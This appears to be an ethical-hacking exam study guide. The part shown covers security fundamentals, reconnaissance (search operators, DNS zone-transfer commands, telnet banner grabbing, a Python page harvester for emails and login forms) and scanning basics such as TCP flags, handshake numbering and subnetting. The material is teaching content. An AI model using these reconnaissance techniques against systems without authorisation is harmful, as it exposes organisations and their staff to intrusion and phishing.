```text
├── 01-essential_knowledge.md
├── 02-reconnaissance_and_footprinting.md
├── 03-scanning_and_enumeration.md
├── 04-sniffing_and_evasion.md
├── 05-system_hacking.md
├── 06-web_server_and_web_application_hacking.md
├── 07-wireless_network_hacking.md
├── 08-mobile_and_iot_hacking.md
├── 09-security_in_cloud_computing.md
├── 10-malware_and_other_attacks.md
├── 11-cryptography.md
├── 12-social_engineering.md
├── 13-pen_testing.md
├── LICENSE
├── README.md
└── SUMMARY.md
```

/01-essential_knowledge.md:

# 01-Essential Knowledge

## Table of Contents

- [Essential Knowledge](01-essential_knowledge.md#essential-knowledge)
  - [OSI Model \(Open System Interconnection\)](01-essential_knowledge.md#osi-model-open-system-interconnection)
  - [TCP/IP Model](01-essential_knowledge.md#tcpip-model)
  - [CIA Triad](01-essential_knowledge.md#cia-triad)
  - [Vulnerability](01-essential_knowledge.md#vulnerability)
    - [Vulnerability Categories](01-essential_knowledge.md#vulnerability-categories)
    - [Vulnerability Management Tools](01-essential_knowledge.md#vulnerability-management-tools)
  - [Security Controls](01-essential_knowledge.md#security-controls)
    - [Types of security controls \(by function\)](01-essential_knowledge.md#types-of-security-controls-by-function)
    - [Security Information and Event Management \(SIEM\)](01-essential_knowledge.md#security-information-and-event-management-siem)
    - [Network Security Zones](01-essential_knowledge.md#network-security-zones)
  - [Security Policies](01-essential_knowledge.md#security-policies)
    - [Policy Categorizations](01-essential_knowledge.md#policy-categorizations)
    - [Types of Policy](01-essential_knowledge.md#types-of-policy)
  - [Risk Management](01-essential_knowledge.md#risk-management)
    - [5 Ways To Manage Risk](01-essential_knowledge.md#5-ways-to-manage-risk)
    - [Threat Modeling](01-essential_knowledge.md#threat-modeling)
    - [Business Analysis](01-essential_knowledge.md#business-analysis)
  - [Hacking](01-essential_knowledge.md#hacking)
    - [Types of Hacker](01-essential_knowledge.md#types-of-hacker)
    - [Types of Attack](01-essential_knowledge.md#types-of-attack)
    - [Hacking Phases](01-essential_knowledge.md#hacking-phases)
  - [Laws and Standards](01-essential_knowledge.md#laws-and-standards)
    - [Categories](01-essential_knowledge.md#categories)
    - [Standards](01-essential_knowledge.md#standards)
      - [ISO/IEC 27001:2013](01-essential_knowledge.md#isoiec-270012013)
      - [PCI DSS \(Payment Card Industry Data Security Standard\)](01-essential_knowledge.md#pci-dss-payment-card-industry-data-security-standard)
    - [Laws](01-essential_knowledge.md#laws)
      - [HIPAA \(Health Insurance Portability and Accountability Act\)](01-essential_knowledge.md#hipaa-health-insurance-portability-and-accountability-act)
      - [SOX \(Sarbanes Oxley Act\)](01-essential_knowledge.md#sox-sarbanes-oxley-act)
      - [DMCA \(The Digital Millennium Copyright ACT\)](01-essential_knowledge.md#dmca-the-digital-millennium-copyright-act)
      - [FISMA \(Federal Information Security Management Act of 2002\)](01-essential_knowledge.md#fisma-federal-information-security-management-act-of-2002)
      - [NIST-800-53](01-essential_knowledge.md#nist-800-53)
  - [Terms to Know](01-essential_knowledge.md#terms-to-know)

## Essential Knowledge

### OSI Model \(Open System Interconnection\)

| Layer | Description  | Technologies          | Data Unit |
| :---- | :----------- | :-------------------- | :-------- |
| 1     | Physical     | USB, Bluetooth        | Bit       |
| 2     | Data Link    | ARP, PPP, MAC, STP    | Frame     |
| 3     | Network      | IP, IPsec, ICMP       | Packet    |
| 4     | Transport    | TCP, UDP              | Segment   |
| 5     | Session      | SCP, SOCKS, NetBIOS   | Data      |
| 6     | Presentation | AFP, MIME, SSL        | Data      |
| 7     | Application  | FTP, HTTP, SMTP, SNMP | Data      |

### TCP/IP Model

| Layer | Description    | OSI Layer Equivalent |
| :---- | :------------- | :------------------- |
| 1     | Network Access | 1, 2                 |
| 2     | Internet       | 3                    |
| 3     | Transport      | 4                    |
| 4     | Application    | 5-7                  |

### CIA Triad

- **Confidentiality**: passwords, encryption
- **Integrity**: hashing, digital signatures
- **Availability**: anti-DoS solutions

Confidentiality != Authentication

### Vulnerability

- **Common Vulnerability Scoring System** \(CVSS\): assigns a numerical score based on severity
- **National Vulnerability Database** \(NVD\): US government repository of vulnerabilities

#### Vulnerability Categories

- **Default installation**: failure to change the settings an application ships with
- **Default passwords**: leaving in place the default passwords that come with a system/application
- **Misconfiguration**: improperly configuring a service or application
- **Missing patches**: systems that have not been patched
- **Design flaws**: flaws inherent to the system design, such as weak encryption or missing data validation
- **Operating System Flaws**: flaws specific to each OS
- **Buffer overflow**: code execution flaw in which data written past the end of a buffer overwrites control data, eg: the saved return address loaded into the EIP \(Extended Instruction Pointer\) register

#### Vulnerability Management Tools

- Nessus
- Qualys
- GFI LanGuard
- Nikto
- OpenVAS
- Retina CS

### Security Controls

| Type                       | Examples                                      |
| :------------------------- | :-------------------------------------------- |
| Physical                   | Guards, lights, cameras                       |
| Technical                  | Encryption, smart cards, access control lists |
| Administrative/Operational | Training awareness, policies, procedures      |

#### Types of security controls \(by function\)

- **Preventive**: controls used to **stop potential attacks** by preventing users from performing specific actions, such as encryption and authentication
- **Detective**: controls used to **monitor and alert** on malicious or unauthorized activity, such as IDSs and CCTV feeds monitored in real time, which record any intrusion attempts
- **Deterrent**: controls used to **discourage potential attackers and send warning messages to them**, such as signs that warn possible attackers about the alarm system and monitoring in place
- **Compensating**: controls used to **supplement or substitute for a primary control** when the intended control has failed or cannot be implemented, such as an administrator reviewing log files for violations of company policy
- **Corrective**: controls designed to **fix things after an attack** has been discovered and stopped
- **Recovery**: controls used to **recover from security violations** and restore information and systems to a known-good state

#### Security Information and Event Management \(SIEM\)

- Aggregating log data and providing search over it
- Functions related to a security operations center \(SOC\)
  - Identifying
  - Monitoring
  - Recording
  - Auditing
  - Analyzing

#### Network Security Zones

- **Internet**: uncontrollable
- **Internet DMZ**: controlled buffer network
- **Production Network Zone**: very restricted; controls direct access from uncontrolled zones; no users
- **Intranet Zone**: controlled; has few or no heavy restrictions
- **Management Network Zone**: might find VLANs and IPsec; highly secured; strict policies

### Security Policies

- **Access Control**: what resources are protected and who can access them
  - **MAC** \(Mandatory Access Control\): access is enforced by the system from labels and clearances set by an administrator; users cannot change it
  - **DAC** \(Discretionary Access Control\): users may grant access to resources that they own and control
- **Information Security**: what systems can be used for
- **Information Protection**: defining data sensitivity levels
- **Password**: how long, characters required, etc.
- **E-Mail**: proper and allowable use of email systems
- **Information Audit**: defining the framework used for auditing

#### Policy Categorizations

- **Standard**: mandatory rules to achieve consistency
- **Baseline**: provides the minimum security necessary; can be compared to future states monitored over time to see what security and configuration changes have been made
- **Procedure**: step-by-step instructions
- **Guideline**: flexible or recommended actions

#### Types of Policy

- **Promiscuous**: wide open
- **Permissive**: blocking only known dangerous things
- **Prudent**: blocking most things and only allowing what is needed for business purposes
- **Paranoid**: locking everything down

### Risk Management

- Risk identification
- Risk assessment
  - Assessing the organization's risks and estimating the likelihood and impact of each
  - Assigning priorities for risk mitigation and implementation plans, which helps to determine the quantitative and qualitative value of risk
- Risk treatment
- Risk tracking
- Risk review

#### 5 Ways To Manage Risk

- Accept
- Avoid
- Transfer
- Mitigate
- Exploit

Transfer != Delegate

#### Threat Modeling

- Identify security objectives
- Application overview
- Decompose application
- Identify threats
- Identify vulnerabilities

#### Business Analysis

- Business Impact Analysis \(BIA\): process that identifies and evaluates the potential effects that man-made or natural events will have on business operations, and identifies the critical systems that would be affected by them
  - Maximum Tolerable Downtime \(MTD\)
- Business Continuity Plan \(BCP\): procedure for keeping the business running during any event
- Disaster Recovery Plan \(DRP\)
- Annualized Loss Expectancy \(ALE\)
  - Annual Rate of Occurrence \(ARO\)
  - Single Loss Expectancy \(SLE\)
  - `ALE = SLE * ARO`
- User Behavior Analysis \(UBA\): tracking users and extrapolating data in light of malicious activity

### Hacking

#### Types of Hacker

- **White Hat**: ethical hacker
- **Black Hat**: hacker that seeks to perform malicious activities
- **Gray Hat**: hacker that performs good or bad activities but does not have the permission of the organization they are hacking against
- **Hacktivist**: someone who hacks for a cause
- **Suicide Hacker**: does not care about the consequences to themselves, such as prosecution
- **Cyberterrorist**: motivated by religious or political beliefs to create fear or disruption
- **State-Sponsored Hacker**: hacker that is hired by a government
- **Script Kiddie**: uneducated in security methods, but uses freely available tools to perform malicious activities
- **Cracker**: uses tools for personal gain or destructive purposes
- **Ethical Hacker**
  - Employs the tools that hackers use, with the customer's permission
  - Always obtains an agreement from the client with specific objectives **before** any testing is done

#### Types of Attack

- **Operating System**: targeting OS flaws or security issues within it, such as guest accounts or default passwords
- **Application Level**: targeting programming code and software logic
- **Shrink-Wrap Code**: taking advantage of built-in or sample code and scripts that ship with off-the-shelf software
- **Misconfiguration**: taking advantage of systems that are misconfigured, whether through improper configuration or through default configuration left unchanged
- **Infowar**: using information and communication techniques to gain competitive advantage over an opponent

#### Hacking Phases

1. **Reconnaissance**: gathering evidence about targets
2. **Scanning & Enumeration**: obtaining more in-depth information about targets
3. **Gaining Access**: launching attacks against the target in order to gain access to a system
4. **Maintaining Access**: putting items in place to ensure future access
5. **Covering Tracks**: steps taken to conceal the success of the intrusion

### Laws and Standards

#### Categories

- **Criminal**: laws that protect public safety and usually have jail time attached
- **Civil**: private rights and remedies
- **Common**: laws that are based on precedent and societal customs

#### Standards

##### ISO/IEC 27001:2013

- Based on the British BS 7799 standard; focuses on security governance
- PDCA cycle is Plan, Do, Check and Act

##### PCI DSS \(Payment Card Industry Data Security Standard\)

- Standard for organizations handling credit cards, ATM cards and other POS cards
- 6 major objectives:
  1. Build and Maintain a Secure Network and Systems
  2. Protect Cardholder Data
  3. Maintain a Vulnerability Management Program
  4. Implement Strong Access Control Measures
  5. Regularly Monitor and Test Networks
  6. Maintain an Information Security Policy

#### Laws

##### HIPAA \(Health Insurance Portability and Accountability Act\)

- A law that sets privacy standards to protect patient medical records and health information shared between doctors, hospitals and insurance providers; also requires employers to use standard national identifier numbers on standard transactions

##### SOX \(Sarbanes Oxley Act\)

- A law that requires publicly traded companies to submit to independent audits and to properly disclose financial information; contains 11 titles

##### DMCA \(The Digital Millennium Copyright ACT\)

- A United States copyright law that implements two 1996 treaties of the World Intellectual Property Organization \(WIPO\)

##### FISMA \(Federal Information Security Management Act of 2002\)

- The 2002 Act established the framework for securing federal information systems; the Federal Information Security Modernization Act of 2014 amended it and codified the authority of the Department of Homeland Security with regard to implementation of information security policies

##### NIST-800-53

- Catalogs security and privacy controls for federal information systems, created to help implementation of FISMA; the controls are grouped into families \(access control, audit and accountability, identification and authentication, etc.\)
- The 5 functions Identify, Protect, Detect, Respond and Recover come from the NIST Cybersecurity Framework \(CSF\), which maps to 800-53 controls but is a separate document

### Terms to Know

- **Hack value**: perceived value or worth of a target as seen by the attacker
- **Zero-day attack**: attack that occurs before a vendor knows of, or is able to patch, a flaw
- **Daisy Chaining**: gaining access to one network and/or computer, then using the same information to gain access to multiple networks and computers that contain desirable information
- **Doxing**: searching for and publishing information about an individual, usually with malicious intent
- **Enterprise Information Security Architecture** \(EISA\): a set of requirements, processes, principles and models that determines how systems work within an organization
- **Incident management**: handling specific incidents to mitigate the attack, resolve it and prevent future recurrence of a security incident
- **Fingerprinting**: identifying the OS or service on a host from the characteristic way it responds; often grouped together with port sweeping and enumeration
- **Defense-in-Depth**: a security strategy in which security professionals use several protection layers throughout an information system
- **Competitive Intelligence**: information gathered by businesses about competitors

/02-reconnaissance_and_footprinting.md:

# 02-Reconnaissance and Footprinting

## Table of Contents

- [Reconnaissance and Footprinting](02-reconnaissance_and_footprinting.md#reconnaissance-and-footprinting)
  - [Types of Footprinting](02-reconnaissance_and_footprinting.md#types-of-footprinting)
  - [Search Engines](02-reconnaissance_and_footprinting.md#search-engines)
  - [Website Footprinting](02-reconnaissance_and_footprinting.md#website-footprinting)
  - [Email Footprinting](02-reconnaissance_and_footprinting.md#email-footprinting)
  - [DNS Footprinting](02-reconnaissance_and_footprinting.md#dns-footprinting)
    - [Types of DNS Record](02-reconnaissance_and_footprinting.md#types-of-dns-record)
      - [SOA Record Fields](02-reconnaissance_and_footprinting.md#soa-record-fields)
    - [Regional Internet Registry \(RIR\)](02-reconnaissance_and_footprinting.md#regional-internet-registry-rir)
    - [nslookup](02-reconnaissance_and_footprinting.md#nslookup)
    - [dig](02-reconnaissance_and_footprinting.md#dig)
  - [Network Footprinting](02-reconnaissance_and_footprinting.md#network-footprinting)
  - [OS Fingerprinting](02-reconnaissance_and_footprinting.md#os-fingerprinting)
  - [Banner Grabbing](02-reconnaissance_and_footprinting.md#banner-grabbing)
    - [Telnet](02-reconnaissance_and_footprinting.md#telnet)
    - [Netcat](02-reconnaissance_and_footprinting.md#netcat)
  - [Other Tools](02-reconnaissance_and_footprinting.md#other-tools)

## Reconnaissance and Footprinting

- Looking for high-level information on a target

### Types of Footprinting

- **Active**: requires the attacker to interact with the target device or network
  - Social engineering and other communications that require interaction with the target
- **Passive**: collecting information from publicly available sources
  - Websites, DNS records, business information databases
- **Anonymous**: information gathering without revealing anything about yourself
- **Pseudonymous**: gathering information under another identity so that someone else takes the blame for your actions

### Search Engines

- **Alexa.com**: resource for statistics about websites
- **NetCraft**: information about a website and possibly its hosting and OS; used to discover restricted URLs
- **Job Search Sites**: information about technologies in use can be gleaned from job postings
- **Google**
  - filetype: look for file types
  - index of: directory listings
  - info: Google's information about the page
  - intitle: string in title
  - inurl: string in URL
  - link: find linked pages
  - related: find similar pages
  - site: find pages specific to that site
- **EDGAR**: database maintained by the SEC that includes filing information from public companies
- **Shodan**: search engine that shows devices connected to the Internet
- **Whois**: obtain registration information for the domain

### Website Footprinting

- **Web mirroring**: allows for discreet testing offline
  - HTTrack
  - Wget
  - WebRipper
  - Teleport Pro
  - Backstreet Browser
- **Archive.org**: provides cached copies of websites from various dates, which may contain sensitive information that has since been removed
- **Web Spiders**: obtaining information from the website such as pages, links, email addresses, etc.
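As an added example, not code from the original notes, here is a small spider-style harvester that shows what a single page yields during website footprinting: links to related hosts (possible subdomains), email addresses, form targets, the CMS and version from a `generator` meta tag, and developer comments left in the HTML. The page it parses is constructed inline for the demo and nothing is fetched; `https://www.example.com/` and every hostname and address in it are assumed placeholders.

```python
"""Website footprinting: harvest recon data from one HTML page.

Added example, not part of the original notes. The sample page below is
constructed for the demo; nothing is fetched over the network.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


class FootprintParser(HTMLParser):
    """Collects links, form targets, <meta name=...> tags and comments."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = set()
        self.forms = []
        self.meta = {}
        self.comments = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.add(urljoin(self.base_url, a["href"]))
        elif tag == "form":
            method = (a.get("method") or "get").upper()
            self.forms.append((method, urljoin(self.base_url, a.get("action") or "")))
        elif tag == "meta" and a.get("name") and a.get("content"):
            self.meta[a["name"].lower()] = a["content"]

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_data(self, data):
        self.text.append(data)


def footprint(base_url, html):
    """Return the footprinting facts one page leaks, keyed by category."""
    p = FootprintParser(base_url)
    p.feed(html)
    p.close()
    base_host = urlparse(base_url).hostname
    # URLs leaked in comments count too: staging/admin links are a classic leftover
    leaked = [u for c in p.comments for u in URL_RE.findall(c)]
    all_urls = p.links | set(leaked)
    hosts = {urlparse(u).hostname for u in all_urls} - {None}
    raw = " ".join(p.text + p.comments + sorted(p.links))  # mailto: links included
    return {
        "emails": sorted(set(EMAIL_RE.findall(raw))),
        "related_hosts": sorted(h for h in hosts if h != base_host),
        "internal_paths": sorted({urlparse(u).path for u in all_urls
                                  if urlparse(u).hostname == base_host}),
        "generator": p.meta.get("generator"),
        "forms": p.forms,
        "comments": p.comments,
    }


# Constructed sample page (assumed placeholder hostnames and addresses)
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<meta name="generator" content="WordPress 5.8.1">
<title>Example Corp</title>
</head><body>
<!-- TODO: remove staging link before go-live: http://staging.example.com/admin -->
<a href="/about">About</a>
<a href="https://careers.example.com/jobs">Careers</a>
<a href="mailto:it-helpdesk@example.com">Help desk</a>
<p>Press: press@example.com</p>
<form method="post" action="/login"><input name="user"><input name="pass"></form>
<a href="https://www.linkedin.com/company/examplecorp">LinkedIn</a>
</body></html>"""

if __name__ == "__main__":
    for k, v in footprint("https://www.example.com/", SAMPLE_HTML).items():
        print(f"{k}: {v}")
```

The same harvester run over a mirrored site (HTTrack or Wget output, one file at a time) gives the email list for a later phishing assessment, the extra hostnames to feed into DNS footprinting, and the login form path that later phases will probe.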
### Email Footprinting

- **Email header**: the `Received:` lines show the mail servers the message passed through and, from their names and IP addresses, where those servers are located
- **Email tracking**: services can track various bits of information, including the IP address from which the message was opened, where it was forwarded, etc.

### DNS Footprinting

- Zone transfer replicates all records of a zone; it happens when the primary server's serial number is higher than the secondary's serial number
- **Name resolvers**: answer requests
- **Authoritative Servers**: hold all records for a namespace, where all records for a domain belonging to an organization or enterprise reside

#### Types of DNS Record

| Name  | Description        | Purpose                                                            |
| :---- | :----------------- | :----------------------------------------------------------------- |
| SRV   | Service            | Points to a specific service                                       |
| SOA   | Start of Authority | Marks the start of a zone; names the primary NS and zone timers    |
| PTR   | Pointer            | Maps an IP to a hostname                                           |
| NS    | Nameserver         | Lists the nameservers for a namespace                              |
| MX    | Mail Exchange      | Lists email servers; the lowest preference number is tried first   |
| CNAME | Canonical Name     | Maps a name to an A record                                         |
| A     | Address            | Maps a hostname to an IPv4 address                                 |
| AAAA  | IPv6 address       | Maps a hostname to an IPv6 address                                 |

##### SOA Record Fields

- **Source Host**: hostname of the primary DNS server
- **Contact Email**: email for the person responsible for the zone file
- **Serial Number**: revision number that increments with each change
- **Refresh Time**: interval after which a secondary checks the primary for updates
- **Retry Time**: time a secondary should wait before retrying after a failed refresh
- **Expire Time**: time after which a secondary stops answering for the zone if it still cannot reach the primary
- **TTL** \(Time to Live\): minimum TTL for records within the zone \(used today as the negative-caching TTL\)

#### Regional Internet Registry \(RIR\)

- **AfriNIC**: Africa
- **APNIC**: Asia Pacific
- **ARIN**: North America
- **LACNIC**: Latin America
- **RIPE NCC**: Europe, Middle East, Central Asia

#### nslookup

- Perform DNS queries: `nslookup [-options] [hostname]`
- Determine if the entry is present in the DNS cache with option: `-norecursive`
- Request the type of computer and OS of a host: `set type=HINFO`
- Interactive zone transfer \(only works if the nameserver allows transfers to you\):

```text
nslookup
server ns.domainname.com
set type=any
ls -d domainname.com
```

#### dig

- Unix-based command like nslookup
- `dig @server name type`

### Network Footprinting

- IP address range can be obtained from the regional registrar
- Use traceroute to find intermediary servers
  - traceroute maps the route a packet travels: it manipulates the time to live \(TTL\) value within the packet to elicit a "time exceeded in transit" message from each router
  - Starts with a TTL of 1; the TTL is incremented by 1 for each hop discovered
  - Windows `tracert` sends ICMP Echo Requests; Linux `traceroute` sends UDP probes by default
  - Windows command: `tracert`
  - Linux command: `traceroute`

### OS Fingerprinting

- **Active**: sending crafted packets to the target
- **Passive**: sniffing network traffic for things such as initial TTL values, TCP window sizes, DF \(Don't Fragment\) flags and ToS \(Type of Service\) fields

### Banner Grabbing

- Getting information about the OS or a specific server \(such as a web server, mail server, etc.\)
- **Active**: sending specially crafted packets and comparing responses to determine the OS
- **Passive**: reading error messages, sniffing traffic or looking at page extensions

#### Telnet

- Easy way to grab a banner: connect to the service port with telnet and send a request \(finish the request with an empty line\):

```text
telnet webserveraddress 80
HEAD / HTTP/1.0

```

#### Netcat

- `nc [options] host port`

| Flag | Function                  |
| :--- | :------------------------ |
| -4   | IPv4                      |
| -6   | IPv6                      |
| -z   | Report only open ports    |
| -u   | Use UDP instead of TCP    |
| -l   | Listen on a specific port |
| -w   | Timeout seconds           |
| -p   | Specify source port       |

### Other Tools

- **OSRFramework**: uses open source intelligence to get information about a target
- **Metagoofil**: uses Google searches to find public documents of a target and extracts their metadata \(usernames, software versions, paths\)
- **Maltego**: OSINT and link-analysis tool, also used for social engineering reconnaissance

/03-scanning_and_enumeration.md:

# 03-Scanning and Enumeration

## Table of Contents

- [Scanning and Enumeration](03-scanning_and_enumeration.md#scanning-and-enumeration)
  - [Scanning](03-scanning_and_enumeration.md#scanning)
    - [Data transmission methods](03-scanning_and_enumeration.md#data-transmission-methods)
    - [Scanning Methodology](03-scanning_and_enumeration.md#scanning-methodology)
    - [TCP/IP \(Transmission Control Protocol/Internet Protocol\)](03-scanning_and_enumeration.md#tcpip-transmission-control-protocolinternet-protocol)
      - [TCP Flags](03-scanning_and_enumeration.md#tcp-flags)
      - [TCP Handshake](03-scanning_and_enumeration.md#tcp-handshake)
      - [Port Numbers](03-scanning_and_enumeration.md#port-numbers)
      - [Subnetting](03-scanning_and_enumeration.md#subnetting)
    - [ICMP \(Internet Control Message Protocol\)](03-scanning_and_enumeration.md#icmp-internet-control-message-protocol)
      - [Message Types](03-scanning_and_enumeration.md#message-types)
      - [Ping scanning tools](03-scanning_and_enumeration.md#ping-scanning-tools)
    - [Vulnerability Scanning](03-scanning_and_enumeration.md#vulnerability-scanning)
  - [Enumeration](03-scanning_and_enumeration.md#enumeration)
    - [NetBIOS \(Network Basic Input/Output System\) Enumeration](03-scanning_and_enumeration.md#netbios-network-basic-inputoutput-system-enumeration)
      - [NetBIOS code and meaning](03-scanning_and_enumeration.md#netbios-code-and-meaning)
    - [SNMP \(Simple Network Management Protocol\) Enumeration](03-scanning_and_enumeration.md#snmp-simple-network-management-protocol-enumeration)
    - [SMTP \(Simple Mail Transfer Protocol\) Enumeration](03-scanning_and_enumeration.md#smtp-simple-mail-transfer-protocol-enumeration)
    - [NTP \(Network Time Protocol\) Enumeration](03-scanning_and_enumeration.md#ntp-network-time-protocol-enumeration)
    - [LDAP \(Lightweight Directory Access Protocol\) Enumeration](03-scanning_and_enumeration.md#ldap-lightweight-directory-access-protocol-enumeration)
  - [Nmap](03-scanning_and_enumeration.md#nmap)
    - [Full connect scan](03-scanning_and_enumeration.md#full-connect-scan)
    - [TCP SYN scan \(Stealth scan\)](03-scanning_and_enumeration.md#tcp-syn-scan-stealth-scan)
    - [Responses to Full and SYN scan probe](03-scanning_and_enumeration.md#responses-to-full-and-syn-scan-probe)
    - [Inverse TCP flag scan \(FIN, URG and PSH scanning\)](03-scanning_and_enumeration.md#inverse-tcp-flag-scan-fin-urg-and-psh-scanning)
    - [NULL scan](03-scanning_and_enumeration.md#null-scan)
    - [Xmas scan](03-scanning_and_enumeration.md#xmas-scan)
    - [Responses to NULL, FIN, or Xmas scan](03-scanning_and_enumeration.md#responses-to-null-fin-or-xmas-scan)
    - [TCP ACK scan](03-scanning_and_enumeration.md#tcp-ack-scan)
    - [IDLE Scan](03-scanning_and_enumeration.md#idle-scan)
    - [Nmap Switches](03-scanning_and_enumeration.md#nmap-switches)
  - [hping](03-scanning_and_enumeration.md#hping)
    - [hping switch and description](03-scanning_and_enumeration.md#hping-switch-and-description)

## Scanning and Enumeration

### Scanning

- Discovering systems on the network and looking at what ports are open as well as which applications may be running

#### Data transmission methods

- **Connectionless Communication**: UDP \(User Datagram Protocol\) packets are sent without creating a connection. Examples are TFTP, DNS \(lookups only\) and DHCP
- **Connection-Oriented Communication**: TCP establishes a connection first \(three-way handshake\) and then provides ordering, acknowledgement and retransmission, so it is used where delivery must be ensured or large amounts of data are transmitted

#### Scanning Methodology

1. **Check for live systems**: ping or another way to determine live hosts
2. **Check for open ports**: once you know live host IPs, scan them for listening ports
3. **Scan beyond IDS**: if needed, use methods to scan past the detection systems
4. **Perform banner grabbing**: grab banners from servers and perform OS fingerprinting
5. **Scan for vulnerabilities**: use tools to look at the vulnerabilities of open systems
6. **Draw network diagrams**: show logical and physical pathways into networks
7. **Prepare proxies**: obscure your efforts to keep yourself hidden

#### TCP/IP \(Transmission Control Protocol/Internet Protocol\)

##### TCP Flags

| Flag | Name           | Decimal number | Function                                                                         |
| :--- | :------------- | :------------- | :------------------------------------------------------------------------------- |
| SYN  | Synchronize    | 2              | Set during initial communication. Negotiation of parameters and sequence numbers |
| ACK  | Acknowledgment | 16             | Acknowledges received data or the SYN; set on every segment after the initial SYN |
| RST  | Reset          | 4              | Forces the termination of a connection \(in both directions\)                    |
| FIN  | Finish         | 1              | Ordered close of communications                                                  |
| PSH  | Push           | 8              | Forces the delivery of data without concern for buffering                        |
| URG  | Urgent         | 32             | Data inside is being sent out of band. Example is canceling a message            |

- How to remember the TCP flags' numbers \(bit positions, least significant first\):

```text
UAPRSF
000001 FIN  = 1
000010 SYN  = 2
000100 RST  = 4
001000 PSH  = 8
010000 ACK  = 16
100000 URG  = 32
```

##### TCP Handshake

- Connection establishment: SYN -> SYN-ACK -> ACK
- Connection termination: FIN-ACK -> ACK, then FIN-ACK -> ACK \(four segments, one FIN per direction\)
- Sequence and acknowledgment numbers calculation:

```text
A.Seq = B.Ack
A.Ack = B.Seq + B.Len + phantom byte

- Connection establishment:

--------                           --------
|Client|                           |Server|
--------                           --------
    │                                  │
    │      SYN [Seq#=0, Ack#=0]        │
    │--------------------------------->│
    │                                  │
    │    SYN, ACK [Seq#=0, Ack#=1]     │
    │<---------------------------------│
    │                                  │
    │      ACK [Seq#=1, Ack#=1]        │
    │--------------------------------->│
--------                           --------
|Client|                           |Server|
--------                           --------

(SYN counts as 1 phantom byte)

- Data transfer:

--------                                   --------
|Client|                                   |Server|
--------                                   --------
    │                                          │
    │   PSH, ACK [Seq#=1, Ack#=1, Len=376]     │
    │----------------------------------------->│
    │                                          │
    │         ACK [Seq#=1, Ack#=377]           │
    │<-----------------------------------------│
    │                                          │
    │  PSH, ACK [Seq#=1, Ack#=377, Len=270]    │
    │<-----------------------------------------│
    │                                          │
    │        ACK [Seq#=377, Ack#=271]          │
    │----------------------------------------->│
--------                                   --------
|Client|                                   |Server|
--------                                   --------

- Connection termination (4-way TCP termination):

  - Server ends TCP session

--------                                   --------
|Client|                                   |Server|
--------                                   --------
    │                                          │
    │      FIN, ACK [Seq#=271, Ack#=377]       │
    │<-----------------------------------------│
    │                                          │
    │        ACK [Seq#=377, Ack#=272]          │
    │----------------------------------------->│
--------                                   --------
|Client|                                   |Server|
--------                                   --------

  - Client ends TCP session

--------                                   --------
|Client|                                   |Server|
--------                                   --------
    │                                          │
    │      FIN, ACK [Seq#=377, Ack#=272]       │
    │----------------------------------------->│
    │                                          │
    │        ACK [Seq#=272, Ack#=378]          │
    │<-----------------------------------------│
--------                                   --------
|Client|                                   |Server|
--------                                   --------

(FIN counts as 1 phantom byte)
```

##### Port Numbers

- **Internet Assigned Numbers Authority** \(IANA\): maintains the Service Name and Transport Protocol Port Number Registry, which lists all port number reservations
- Ranges
  - **Well-known ports**: 0-1023 \(2^10\)
  - **Registered ports**: 1024-49,151
  - **Dynamic ports**: 49,152-65,535 \(up to 2^16\)
- A service is said to be **listening** on a port when it has that specific port open
- Once a service has made a connection, the port is in an **established** state
- Netstat: shows open ports on the computer
  - Display connections in numerical form: `netstat -an`
  - Display executables tied to the open port \(admin only\): `netstat -b`
- Some important port numbers

| Port Number | Protocol          | Transport Protocol |
| :---------- | :---------------- | :----------------- |
| 20/21       | FTP               | TCP                |
| 22          | SSH               | TCP                |
| 23          | Telnet            | TCP                |
| 25          | SMTP              | TCP                |
| 53          | DNS name lookup   | UDP                |
| 53          | DNS zone transfer | TCP                |
| 67/68       | DHCP              | UDP                |
| 69          | TFTP              | UDP                |
| 80          | HTTP              | TCP                |
| 88          | Kerberos          | TCP/UDP            |
| 110         | POP3              | TCP                |
| 123         | NTP               | UDP                |
| 135         | RPC               | TCP                |
| 137-139     | NetBIOS \(SMB\)   | TCP/UDP            |
| 143         | IMAP              | TCP                |
| 161/162     | SNMP              | UDP                |
| 389         | LDAP              | TCP/UDP            |
| 443         | HTTPS             | TCP                |
| 445         | SMB               | TCP                |
| 514         | SYSLOG            | UDP                |
| 546/547     | DHCPv6            | UDP                |
| 631         | IPP \(Printing\)  | TCP/UDP            |
| 3268        | Global Catalog    | TCP                |
| 5355        | LLMNR             | UDP                |

##### Subnetting

- **IPv4 Main Address Types**
  - **Unicast**: acted on by a single recipient
  - **Multicast**: acted on by members of a specific group
  - **Broadcast**: acted on by everyone on the network
    - **Limited**: delivered to every system in the local network \(255.255.255.255\); never forwarded by routers
    - **Directed**: delivered to all devices on a specific subnet, using that subnet's broadcast address
- **Private addresses**: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
- **Subnet mask**: determines how many addresses are available on a specific subnet and whether a destination system is on the same network as the source; represented in three ways:
  - **Decimal**: 255.240.0.0
  - **Binary**: 11111111.11110000.00000000.00000000
  - **CIDR** \(Classless Inter-Domain Routing\): x.x.x.x/12 \(where x.x.x.x is an IP address in that range\)
- Network address: 1st address in the range, network bits + all 0s in the host bits
- Broadcast address: last address in the range, network bits + all 1s in the host bits
- Any other combination indicates a host address in the range
- Subnet calculation:

```text
IP address:  130.192.202.202
Subnet mask: 255.255.248.0  (/21)

- Step 1: write both in binary
IP          | 10000010 11000000 11001010 11001010
Subnet mask | 11111111 11111111 11111000 00000000

- Step 2: keep the network bits (the first 21 bits of the IP)
Network Address   | 10000010 11000000 11001
Broadcast Address | 10000010 11000000 11001

- Step 3: fill the 11 host bits with all 0s (network) or all 1s (broadcast)
Network Address   | 10000010 11000000 11001000 00000000
Broadcast Address | 10000010 11000000 11001111 11111111

- Step 4: convert back to decimal
Network Address:   130.192.200.0
Broadcast Address: 130.192.207.255
Usable hosts:      130.192.200.1 - 130.192.207.254  (2^11 - 2 = 2046)
```

- Decimal to Binary:

```text
  0   0   0   0   0   0   0   0
128  64  32  16   8   4   2   1
```

